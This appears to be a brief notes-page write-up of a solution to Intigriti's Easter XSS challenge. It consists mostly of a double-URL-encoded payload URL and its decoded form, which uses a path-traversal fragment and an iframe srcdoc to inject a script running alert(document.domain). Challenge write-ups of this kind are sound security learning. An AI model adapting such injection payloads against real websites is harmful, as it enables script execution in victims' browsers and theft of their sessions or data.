Random notes/tricks/other things that don't deserve a blog
Intigriti easter XSS challenge
Solution
My solution to Intigriti’s XSS challenge is:
https://challenge.intigriti.io/#../index.php/lolman%25%32%32%25%33%65%25%33%63%25%36%39%25%36%36%25%37%32%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%37%32%25%36%33%25%36%34%25%36%66%25%36%33%25%33%64%25%32%32%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%32%66%25%36%63%25%36%66%25%36%63%25%32%37%25%33%62%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%62%25%32%64%25%32%37%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%32%32%25%33%65/diceme
The decoded payload after the fragment looks something like this:
#../index.php/lolman"><iframe srcdoc="<script src="/lol';alert(document.domain);-'"></script>">/diceme
One interesting thing to note is that most people used the reflection in the 403 page...